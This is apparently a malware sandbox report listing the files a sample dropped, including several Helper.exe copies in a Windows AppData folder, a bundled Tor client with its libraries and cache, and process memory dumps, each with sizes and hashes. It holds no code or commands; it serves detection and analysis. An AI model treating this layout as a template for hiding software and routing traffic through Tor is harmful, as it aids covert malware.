SHA1
700f02f36668efadbe66ab6a2195ea9af2dd9875

SHA256
e98a2b93cf947e304d7c44dec445474505ab04f2b647fac22604cdc56bee4479

SHA512
d91d25fc03510460a6bf4d3a2081308abdeef41ece9eb360ead01bfa44a9b20ee41a06e2fd0c7a6dd81f6baca2128695dfb5ab9990c52b01d39eedaf55259b14

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
3.0MB

MD5
38127c3c352f3514737b7656a02dfcdb

SHA1
ed670de5a308165fe8b0f58115c954d7b7b3a08b

SHA256
08b51ea8eb8e9337f305a186c1e3476aec8ee5ca857aee63781811d4971f4441

SHA512
81ff82e2ce8fd5c5cc5159d28804f60b8f39367d75dee5d70ac72ec632d803fb39ba77e957a16dda11a4d7fc6130501d8b6b429e38fe060e481307c7d370f15c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
96KB

MD5
e610ee54d5c0f35099624664431fd24e

SHA1
1c758eb96d1921ae62621289a540b0632ae065c4

SHA256
120cb1029dd69384e3468eceb6001f6addaa8c678a62c59cd006305c0da1dc21

SHA512
13a0217d8e641030d7071efd2167d54431a322274ba5bec4eee73413e3bb196d2f2172b3ed3fcdcec6b1e3e3bd6dcee68efa6c858cb4e45fa2a6a56fe9b3dc04

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
69KB

MD5
27c157debf152154b766e5e0afc67cea

SHA1
62b893f25215dfcfedc108d5c6bc5c5f8d91053d

SHA256
64ff845fd57ff536b37802eb8751c71ecee7de8b1b2d5d56000e43e0de07febb

SHA512
06db7f292caff078ec5bea7a0a799ec90f4dd21a9520f85913505810da45e0619819dd8bee46bbcdc6e7005effe83f0f7f90b98485b42c1f496938c7422066ce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
209KB

MD5
acd7c2d0f51ef6bd22ac1962f858ace6

SHA1
a7c6e102ea0e7bef31c292f311a5b75f1fb7a970

SHA256
080608fc93065f0926e1d89376c3cf8ad71b6e9fff46f2dca92cbdace4c26120

SHA512
8c8aa96da1112aac04edde8656396ff6bd18cab267e26a1c442666238cf55ad8b8040dfab92e95a37643d75f654339cb6328e3899034e728678c0fc304cb318a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
288KB

MD5
1e6bc9e55d8fa5ef7a18b1b2d0ba1ce8

SHA1
e07c73926fabeebb9174410af637bae2bf6a4f6c

SHA256
9ab83ab6b8eaf655cb2014d1118838f22bd7423c8a03d80b160241564146b4a5

SHA512
069329efe84cdda521da117697597ecf91ed7b04beed18cbea1128316e9dd3b50a1cabb359e2375c6f0f5a35d9a31bd98d4344ed018673a64609f0e50f119289

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
441KB

MD5
88bc8cc212695f6837edc41d3533ade1

SHA1
0fd91650fe551e4bf2886ec2671ca09f8067e426

SHA256
94bc409592e0acc66d9a10c07bef111b68deea3d1951aa722ca6c7b6f21e9733

SHA512
9daf5d04d9235775f74befb7ab75e0c0d2cf7d565b9026944ed228087dbd68e575202c90dab63bb46dc8c8d4adcfd3459d008287ad92fc8538deb1024885a360

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
466KB

MD5
ab839925f076b78cc56bca66dbb5fcb9

SHA1
7456b24dcae4fdb6b6dc25388825c8037bab0ab6

SHA256
797892147b4627bde1e7c65d6dc523b17f45c0e2ae18d19326d84355468e59da

SHA512
2b4680d9399504c8cc55575af429d0c5f852126d1305cf06e7c5e98d66d70dbe7b188cfa6ca03e8a6fcf0428959b5b785d6ea3f8c72bdaf514c57a5d09455823

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
1.4MB

MD5
0771baed4fba7a12d717e359f5fcaa6c

SHA1
d94f2262319b817f12bc86ffe0ee145fcc6bb87f

SHA256
8e2a03bb96069eefc0c71691244b26c846bc3ad015121721603e38bcb72ae29b

SHA512
90243a375b3e4419e7a2d4fa9711a08cc3a99d8bf7ef4e8f485d13842150f57ac45977a7a4cc3cfb58bfe63bf2f8e99019320d7dc2cac623f4a1c8c6fbc2eadb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
747KB

MD5
9c3770d7ac22c68d2cfa61020ac17c67

SHA1
cd29a0f5f317b5d7d2c5a5747e6570bfb87f0ae6

SHA256
f2319edb007a4e509a96901874547251af04af6e1f379b75869bad5dd029551f

SHA512
cffe91ca93819a3863a80b844e9164abae865856583760f89f65e3fc22f0002db16aafb264e130d5fd2e30074ef8a46bc905657482157f47d892958b92301b91

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
1.4MB

MD5
046c1ea7c4f21b5fa96cb58d2a255699

SHA1
169715d08eda1eaff5d65095d42e6c469b0888f6

SHA256
c74b0ae7b09c6abb64d33d1a9f97cae3c7b0790cbe871a80814d75b1e4745c4e

SHA512
3cc18fd4fc910480f05afa4c83794de1b3a89f01fb9da63272141acb2be86a60426081c9d35bced664c39b3e50a19b3556ff2d0be2a7502569c7a0d551b3c640

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
76KB

MD5
3853cec28359b9b1e8c320dc13f97b81

SHA1
deabb00bea1c98ebc9dc99a3449ef9490b65cde2

SHA256
8082bfe28f89831e69760f9dd3b843199b31db13bf329d33e479a7018f28e3d2

SHA512
d0e3ec290c817c60686311f7190667adcc36ed21585f2f096bdeb61dfdeb42613fea9ff52147b35a24b154f7e1f16ff3f38a8042eef941d93983abcadf9ab55b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
56KB

MD5
0e690495fd4ea16446aacade575f9d6b

SHA1
d8b7b5b6eb2a3c21e4dc0c676c39edb9e98f3460

SHA256
606f46d24c39f110e6189537132328cb14971da78d654115d0a6faebd9e09429

SHA512
2755e36b1d9d7a998773fbc7d677600b75b68cf88d412b7e1648300748255b600d32f673f5d8badbf0295e23dce3f1f38d033f229c4a57d51db59f7824669e74

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
157KB

MD5
fd902ab1289840ffa8feda610a87a88a

SHA1
27236bad24dc626cbb6f24d6d248e6cd73a099a3

SHA256
2b4b6dd0f3d86b3ea403f2be2f5285616643e757dc95ce6d7cc901ec5ebe41aa

SHA512
a4f88598811f5199b24e5fe791dda65195a0c7d57b834f0abe6c77b91402b47596f661f0ea287c101fa2cee9e981be04838b4315186bd5155fc44e3d22dc0ccc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
178KB

MD5
bf3c83a084d1aa0804f18cf4d2829345

SHA1
8d3d3c7f9461e5aeae6e89838c20a57dc39e7d98

SHA256
e448598ec36041f2afa3f484646a16b01e217bb2bec8a6beeddd06b37ecf36d9

SHA512
a6068ab7c5d76993a4a453d1de29c00868ad5edcbaac89fe81dce31d90b345f4916dc3556c156af3d7ce5aae60109f04790e06f602daabd65dae420135c5219d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
98KB

MD5
3b324d4daf2caf9b96fe54152adc560c

SHA1
ff3e6603dc491b6773fddf166a2c6e0cf93dd991

SHA256
ff195439e992f838e054551eb456e26bcce6ddf0ffd7f82597acae33f5ba9081

SHA512
55ad232864ffc2fb94efb2f9972247d8cabe97b4b28cfb7a43d4050ea07c9ce4566f6e7cc751eac24d7e32387f17a573fdc4c7a993361c92f22b801903cca920

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
86KB

MD5
ef24a416a28aa2501040d83792f46fdc

SHA1
9a94dcb697e1f55401f41c740aaf767f49069e00

SHA256
20ce41b20391236ad14255f9f6b9c1c8b3ac689bb04ba66dae1a9ab5a0e9d1f8

SHA512
e423b21d06e61ef5ad372477265ad09a101cfd9454b31f8344e1f70619a432d7dba1c44d9d09ab8df4040b183f3385b2a80caff34aa277508292b78711e5e754

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
45KB

MD5
afede5ad8b302f27a575ef6f8b613962

SHA1
7e2e2da062d2fde95c7be10c55e4a3535c5c717a

SHA256
3bab04039f5c07fe8f2f0c68d7e23c541b8567958b7d065596252603da08e281

SHA512
6b9184bd95f96b1211045ac486379a5a321fdc111d3011c85fe877cad457a4a1e8b6fc83fd038073c78c2fca92d5dfb6418c77473c3dcc9acdd79b3a082e6e59

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
8KB

MD5
2dfeaa645d6bd7c5e73084c57e136b1e

SHA1
9c9c848c5b3b17e20e8cd632cce559ed1c7d200a

SHA256
eb5ca005f9cce9412dacbb2ee055740be9cd1adf5485cff8519a9c1a04b46d30

SHA512
487620262d74d93a41668ef0b4c42a20b8dcb81cea8471df7f053362423d73db625b6561a17bf7f0b0db2b1af14fbe271b5154f9d445119d6e7fc141980a6e5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
134KB

MD5
14dec7e89ef9d33f6c3a65c616f9b080

SHA1
f15853e2e9c61ecfcf6b0e89aea74d926876bb94

SHA256
e685f778d54d1b872778dffee1d9f7d183c683e85337268774e00a2e15b9af2e

SHA512
5efc9d9fc0205177e78847cbc5520975232349252f2c221b1a24163bd85f6e95704198bafec0de9aaf08aa01e62a93076971f13b6f0035ea60e81e67dcde5f96

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt

Filesize
534KB

MD5
b4c49bc6d1fe171927c73ed3ed1c7025

SHA1
11ddc08079b25a732c614e51112a52ea2850b698

SHA256
914d4a024010aafb9b432e133cb9fb9320bfd381ebd928c54c173f1bfea9598a

SHA512
2a4ba45e19acfee997fd1f6906311fac500a55365e20160f0b891df3d277465a0e54becdec149f24f6146670b8ec9b85ac306dd044bd0846bce8c28e0467cab1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp

Filesize
75KB

MD5
492019c6e049a308e216b76abfb4c066

SHA1
d7f6ee2645eef4dbc8980c52720b651625f32d1e

SHA256
334a81b817459be146839f122c6a0763a3d4ed90eb437507013cb9f2cd645a58

SHA512
65be265cb406b82b5d68f37119ece2457e16cf00fac5ffbb522b082de0786ca5da51ed6057f47f8b86bdc2b42d4077806cb1a7cd6cce3399321d4e41769fa59f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs

Filesize
20KB

MD5
1e57535c4574b0a9ce057181777e34c0

SHA1
b72568c45063a2212939891ea5d5b08c27c3575a

SHA256
e5a8795c90680b271f1f6c8aeb9f1b044761c5308067c20531089f62e5114575

SHA512
042f977cbd2262148c5f8cf3a3de69ceaa4fc1cbb9542ba14d7dada53bf96f610c37037d6bd77b8ac588d1fc6ae69a46c69e5df72198344a087871dc6cede712

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus

Filesize
469KB

MD5
55b0dd6075383eab782ed6ed8ddf958b

SHA1
3263b2c0b23fd074235b12b78dbe385ff3022ff7

SHA256
96260ad7502b938250025f0d433ca767e7fc4a0bd2abc31550146bb8d1ecffc3

SHA512
b20ebe1a1ebbe4b347194c4116175a45e4ef9be685e3468787fb4435bd9d5b30e0822b6725b6c4feab0f22146906f31ac001ce33b965a2f5132a6e1dc2204a6c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmp

Filesize
68KB

MD5
27673d7d57485c07b3bb101902665024

SHA1
1666f9b30efa25b715047099fb91ba319381d888

SHA256
6c4ce417c344ce87087346a5fdde7afa00ab93d64b67e210c7dc0a02d3c41524

SHA512
3209b1df305f377d5905504b53f89e1edbc80b14a05314290e873e6e3238d1cf29d047f190ff86548934a1b9ed997e06ff09664161ca9e3a1271050ef7a76e2b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
183KB

MD5
ceee71ab7373f05ff18a343f3502bf7a

SHA1
8bc7ec521041ff1c9da1ca17f7233af24b7b9295

SHA256
cf64f4b00b5728d366dde4c2fac0b0863386e733560e03eddbaa6c971f379628

SHA512
12a8a654fb4e9d4cde49ffa3af971a20b8d6eeaedfae6dc682cf87600963002b93dbb27c99a98df370bde76946be769a5e57e147d5b855ef7cab1a426d4151b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
480KB

MD5
dabde545046b55bfa327bac0ddf9ab56

SHA1
9617db065b000c4ed25ea0096ef217ca757c0c97

SHA256
a3e5e03aa658fee9ae2f775df5ddaae31295f43c0aa14beb663124c9250820fa

SHA512
9eb42b13576b15070b34c715f1999e33707dabfe888a8b1f9aca015c6053cf7eba2aee3770a482d080c9b20cf049c44ccce4d4c35754300961632937f5218f62

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state

Filesize
4KB

MD5
5082ec8e89e284dc0845336d9db410ec

SHA1
4f40fe790a19708386cbd9d6f0e6126fac449ba9

SHA256
0e15132e18484aed45c1a5053bf7bdc4709f0b7d8e4ff92816f0f3e4362cc2e8

SHA512
9e89ee427ed1d2f99acc3e15d0eeb95f21c43a0b37075273a7d72abfbd7a00fb3760e7c08fb0080fd2477bce1683026c15aee947d1dba1a725d9bbc791d2a073

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\unverified-microdesc-consensus

Filesize
522KB

MD5
eb43662a720a6d1362a2668d1555f37e

SHA1
fb16f7b3cf7c930a97c8ac09fc761966c8ac91cc

SHA256
5ff8b4a274d2c87acd2beb364f0d5d6bd9ca40a617256458b0c4752322610bfe

SHA512
cb3468c2cde03825dc802564b37422504454561f49e43854daef61e70af81a255aa79961eca0697fc09247f91564e6faf9657a99244a72e4040c317b54a2607e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid

Filesize
6B

MD5
12de38433d9208b58d49cc6cf7301cfd

SHA1
78ba135cd7e33ac6a8ee5a7919d8f83bcf70f91a

SHA256
e52fd12bbcf7acc6e1e0ba8a20775163732292b2743a79dc4de0b93e337e959d

SHA512
4074ae457c922b3b23be1068be634fae6cdcc559a9165780ff4fbab1b373084d9fa0ec97e0b405c303b354626274db6f7262ec060243cdd056a2b3a1774b5801

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig

Filesize
201B

MD5
b9d2fe9cfa840518fa39039c928d4938

SHA1
0561516b7cfa784cf400349983817c8b18817256

SHA256
69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

SHA512
894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
53KB

MD5
851521202a4ed698d355e7c62abf8902

SHA1
c7517fb674ebea86b27baec580b7df2bb82a9fa5

SHA256
535aba9fc512eb6ad761ab1e7a71e3b01d7246edb12ba59aa081aea00a633db7

SHA512
7fa6040ebbecb55e1bf2e81ae4770e9f9923ed7d0af26f54a9c0424c84a3f11f3ebe39a0b133fa2db839c9ee5c7bc5429bdf727a2d075b2ce56c5195ab359967

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
25KB

MD5
b8973548c5f1fa6b2d382b33b0b2c9e0

SHA1
a6bd26b6ace133b5a4987bd32528a37d637faf83

SHA256
f33fbd8b05da5179a5238013730e18babfe8272a744f49a059d7d551cbb88a42

SHA512
ec26bad59657e660b2730e7ec93ece9bcc1bfb7cd2eda9b8940e5cb2888a021b31f3b9144a0f318a236d0efadb8ddff42f47309839981f744aa41346b1d0d93e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

Filesize
573KB

MD5
d9370eb8fc655768af7709de0ac33875

SHA1
a3770154ab8b73cf9de3c65d78ce271ef0b0c613

SHA256
8eb93819a298a2abe3f27079f5f85462a68b503d4a6bd89f5864379ab607e28a

SHA512
10191ac8296155b78e4807235a4033ad2f42e62f04339bfa936df1faa1bce895af0615e000ddec61dae23a7e405c2f1ed82ef7f28c40937a5df2a1b570c157d7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

Filesize
558KB

MD5
415c6f7297ff785a60b93fbfe042283e

SHA1
790d3c23ef509d0d9f3f6ce9af1d39950b7f05eb

SHA256
ebe1874672f6e9eb53410c2794a5292bdad50aa3097657e12820ce70beff7e29

SHA512
a7e25ea3b7ee5db2db1ad9c0a5ea478f7390346bca6f8688d49d04d6a0f2dcd8cff3f3942e3d9bac5e0d485456d09a28c1213c1edd9ce567c04b378c25a7099c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

Filesize
540KB

MD5
ca678742bde7dcdf5df656157cd522bd

SHA1
aa1b3954488d76da8b5922a4cbfffbd03c58c055

SHA256
6f8d76061784d9fe157748f0b61cdde8eec8e17249dbe82224e24caa77fda366

SHA512
e099e98d38e092cbfd2ace248fde629cb64b7013ebb4ad35791922a2784d2f152ecf89d093fa77a04e66daa68bb33a9f3c65e0591fd9209b894f3bccdc414150

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
31KB

MD5
1317fbe14b27a5089d5f33a3ef106c4d

SHA1
8024cb26e05222b4a63b457b22d61675e08f143a

SHA256
f96e72a02399758c7401936fc91aa62f24b1614e15391bef9af4cab696f489ee

SHA512
7da93ab9cb131bb723d5c20ba3f0b6c5669366564ea4cad7e20ec6875a0ce4a18cd4c879b8c03772d8b1215887ade537a9cc81344eb2f82dc4912a0c6e740fa6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
21KB

MD5
932d4ae928ccaaeca7650f7f46a5693a

SHA1
4d27dcf23ac49626d64e981d8c0a07721525fd4d

SHA256
c7bcb655af30c74bbc4241472c3d88d0aa2fa6a1bb7173c21f7d610fda7d8756

SHA512
0b5ea6497cce9f031e9536439e168d529353926eada906230e0c7df1554f371dba4edd076815c1cf6d5d96db684cf02d50523eaab34d69904597334beffea969

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
71KB

MD5
870457f66f6ff8264f1eb9ef790978de

SHA1
4b914a65021f1fbc1fd4f636e59dab184fe195b4

SHA256
5fb00ad556c393fc30b912a0df414cf81b9e6532b137a9e5b7401cc742b80f1c

SHA512
611a12a0cab6cb88a0a8f3c1128321621975f34a7cfea49f605106419878dc8b873ffc0e7611d50673b3f0e3be46039da568c8828d201269524ec4aef1fdc01b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
29KB

MD5
5ed045b18c98a2f04a317eb90cfb5cc0

SHA1
5451b1bd1752b36b9c492a6d1a0b0f303b8ee26a

SHA256
500004db6388579ca2f42493fd34d42529b7d78b5afe66968aa12e0bd49503dc

SHA512
8d196fdf53b708739c4867ea3c46708e646f7f0784cbcd00e139851786fbff05b8d731732f0f86bf3a42974c46cb0228311e00f0a5db34c2fad78bd72f535b0f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
98KB

MD5
b31af0454bbaa1abfe7f78a877bfb32d

SHA1
010bd4f59e3af3389d8227ca34436be547fc8bee

SHA256
3c76362458d86c39470786424e469596cf3c990360e7887252a4d0710e062087

SHA512
0cce4ecd2b22d3cf85dece9fbb92287ce63b563f19308336c39515cb52087ec05d8dd361905e9d924fdadc7ef7c3075809518e8fe085ede56548b148761372fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

Filesize
48KB

MD5
456d8ccce4c43bb9389a3ce9de332df2

SHA1
8431d7fd8af7638db6a05be180c256dc6b362089

SHA256
5642e2e1504553ff3c72ba4c206bd4c023b505e3d18d240aa4c15b44325c1ec1

SHA512
385609fcd9feec3b0bccb3a94b9eace69be2ac6b9b5accba2f72634751cf2db78cf2d5e12a3507c4d45df598d849804f4f587b7df2caebf818a08a9c514868a5

Download Submit
\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
348KB

MD5
2f351764e947aa9d5dc7b92a56520f1f

SHA1
0994dafe823196e5d2873d26aa829ce7808d96de

SHA256
dd3f56a1e61fd214f16694aa38c004ae32e1cdf5ebbe842c9146891fcbf6b834

SHA512
1936f67ed4285347aa47b138b76f764f91c09e92fcc31829db3c6668034482e167a8437f2cf603333bd75cc306329ab7a4a1593b1d0ab4e40ca9bb4f02362ba5

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
82KB

MD5
922f23c79e5094485ec880a76e4e7669

SHA1
6f76a728dea6a4cb951d72d49999a652e33c6802

SHA256
46ac39dcf0b32cd673b9aa8e91e875cfa13d13d89b6de774e8c48e213eaf77a3

SHA512
39599ac716226d819290c861725ad573823eb415904483c2ced6c52f27a83d760c78f271f4758e97a6a460ecb4995bbff8984618bee488fb3033f78f294aac3c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
218KB

MD5
098681142fd300b9a3f28ec0f56af871

SHA1
9320afd2dad32c4db02926a5e526581d0e9ce5e0

SHA256
c24c404cab0c3c2f7933c3a2e3c9778f93581e21c3d64d38d92b96452c9ac847

SHA512
45f435231d11202d34dd0b43145f74f7e38593f63146cb6aae66a0f2060df225558571a825588e0d5d63c82144167c3147a4feddd7045814f6f439bc5c4dfe56

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
180KB

MD5
2f9643572dbfc81aa2c101d5ea653559

SHA1
7e5e849d8c055d7eb9554c8a3a0e975acd590ca6

SHA256
8fa52e80e9ac0115896aa0066a17af1664d1f9684d147e11cff621d2cb712b8d

SHA512
2f4a6f9c4fb76222e6a22950ac54d6c20b81c6c63527700d8228d65df7bd6e0dc0031fe26da0dd9fbd3e5fbf3d106ad4c266e52bf0732c082661620854572675

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe

Filesize
49KB

MD5
184d965de02d86c87ccb4a06b0d12e94

SHA1
e93613a748a9e5dab3bbc9cafbdd59bf16320b72

SHA256
85c35a1ab94a2b0d53b5279c82c3deb39a88a929f405d61f5e004808d50c063a

SHA512
d87150723c2b6eaef59337b2fadf28fd7b0fabe3d84c9655428ef56151257e67c738e58e4d2c22c5b9310734787b2b75e4c9fc6d8909243233cf7784bebafa6c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
10KB

MD5
d690875d7ab75936a0018357360bb2fc

SHA1
2ec16f00e84ee66ab155b2b432fd13898162efd5

SHA256
e32a8e7e34203a7353ca07ef1f9808965e26de581b8842bc25c0c1bf2c896270

SHA512
7dd2e7aff5e4d370bab8f69b0f1c231e1b0dd3f4eb2028234030d3addeb7eef42c94322d30090a1124d01b033298d58a5a472605459ea06407fd89921e955278

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
35KB

MD5
1386f97c2fabd991c29f45e40b759838

SHA1
1a8e05a2d7d47fc8dae773aca2cf66f039011250

SHA256
17488096741c289d88848b67987846c15cc0a5a8a725fad6fb44c48795d84cb7

SHA512
ad5ec153d29361d34e3320bf44637adeefff5f1fbb2e6ac4e81b95d5e01534f2b2ede5bdc2374250f7a7919daced7641bc7b691b609954ac8d956e29347d0d5e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
27KB

MD5
15f4e82bd02dd5712ad254db9badd372

SHA1
1a4810c96e42324ddd1f4a67ec620cc49201365e

SHA256
768ff0598a43fb2e0c7dac895466777521439be485204892275ebf636bedca3f

SHA512
a46f5deda7d53a0f7c45cf6e63913e9df16951aec28afea686a736e2f6b34cb533289b73bf93303d4d1e796a29ce10d874504524c4a7a55b39cf95e55a5959bf

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
10KB

MD5
8e086b2fec492da1dd8d3666cd614eff

SHA1
c231781579cdc524809982fae5f17cddf36ce5ad

SHA256
bdd4af3ae632fe85fce67624d97b53d3064be13f8d45e39375ec8da5ff563ed1

SHA512
78e0ce041a197a184321702bfc4b3bc1f98d9d9e7c3c34011feffba035b9a406405210f3ec54dcfdeff1b1d2bea846629a5c02576d8690f7beb386348228bcaf

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
97KB

MD5
7ef1104f672134906234b529a502cbdc

SHA1
56c61798aca1430d5cd91f4b466acad890ae86ac

SHA256
cf386225a26b57496d587020c24b25e2d940831ba0df136460c91802b62f7637

SHA512
8a3ebbedd149805903a3cdc3820a23502aa90913770bb414c0bd27878cfcd7bb1b96784da2e21ad091d6b67d1cdfd784e72f783282954ace3f496ee8878bece4

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
61KB

MD5
3ce9c318569f287379b7f6f4c3c1c75b

SHA1
337832bfa2b5991f6cc67b211afe8cdf7e8499fd

SHA256
e8ed04d626e9d249b41d3df089315275abe63a2e741f8d27dd11aa2ab9803dcf

SHA512
e49fdf753e76ccd5b479293ea3c14326f8807aaf55534c41ee852e1c511f9a37aab68652901c029225250f0f77bf256f5a14803704d46acbbfaf4dbbe0e04616

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
88KB

MD5
7dff9e007f5e6cb8de34882cc73b8683

SHA1
cd204c179ad0bd3f5dc031aa5747d923dd91dc9f

SHA256
efa036f0c8c717d0357b7cfa3dcf77d3282dbc7a1c79ad70692ec730942fae0b

SHA512
b8c244aee48383304f8966a48f8639d7f9863687407605bb1f3e1065e8ae2a8c8d05458d484c0cac52429a166a306359be135659885c45f275652a64cfe2ca3a

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

Filesize
93KB

MD5
c6f59a95d96644b4a35cc9275898f222

SHA1
b7c49c45818769e1d0c6290fdb96b5e7263f6b17

SHA256
56e57c2d8746a53687537655fb73be30732f218a63fd2aa5748a42c7ee718ea1

SHA512
cc3494417377a5fb8a423cc5ed701e2a66551459c02584d1e31e35a994a4eecbacb292a358bddf434617bde6d24655c57785e55dee4f9db270ebc07acf37d874

Download Submit
memory/1636-3520-0x0000000000490000-0x00000000005B3000-memory.dmp

Filesize
1.1MB

Download
memory/1636-3517-0x0000000000490000-0x00000000005B3000-memory.dmp

Filesize
1.1MB

Download
memory/2156-3549-0x0000000000E60000-0x0000000000E80000-memory.dmp

Filesize
128KB

Download
memory/2156-3547-0x0000000000210000-0x0000000000CFF000-memory.dmp

Filesize
10.9MB

Download
memory/2156-3561-0x0000000001180000-0x00000000011A0000-memory.dmp

Filesize
128KB

Download
memory/2156-3560-0x0000000001160000-0x0000000001180000-memory.dmp

Filesize
128KB

Download
memory/2156-3559-0x0000000000EA0000-0x0000000000EC0000-memory.dmp

Filesize
128KB

Download
memory/2156-3558-0x0000000000E80000-0x0000000000EA0000-memory.dmp

Filesize
128KB

Download
memory/2156-3557-0x0000000000E40000-0x0000000000E60000-memory.dmp

Filesize
128KB

Download
memory/2156-3556-0x0000000000E60000-0x0000000000E80000-memory.dmp

Filesize
128KB

Download
memory/2156-3555-0x0000000000210000-0x0000000000CFF000-memory.dmp

Filesize
10.9MB

Download
memory/2156-3554-0x0000000001180000-0x00000000011A0000-memory.dmp

Filesize
128KB

Download
memory/2156-3553-0x0000000001160000-0x0000000001180000-memory.dmp

Filesize
128KB

Download
memory/2156-3552-0x0000000000EA0000-0x0000000000EC0000-memory.dmp

Filesize
128KB

Download
memory/2156-3551-0x0000000000E80000-0x0000000000EA0000-memory.dmp

Filesize
128KB

Download
memory/2156-3550-0x0000000000E40000-0x0000000000E60000-memory.dmp

Filesize
128KB

Download
memory/2828-48-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2828-50-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2828-42-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

Filesize
4KB

Download
memory/2828-44-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2828-40-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2828-71-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2836-141-0x00000000011C0000-0x0000000001621000-memory.dmp

Filesize
4.4MB

Download
memory/2836-168-0x00000000011C0000-0x0000000001621000-memory.dmp

Filesize
4.4MB

Download
memory/2836-98-0x0000000075140000-0x0000000075213000-memory.dmp

Filesize
844KB

Download
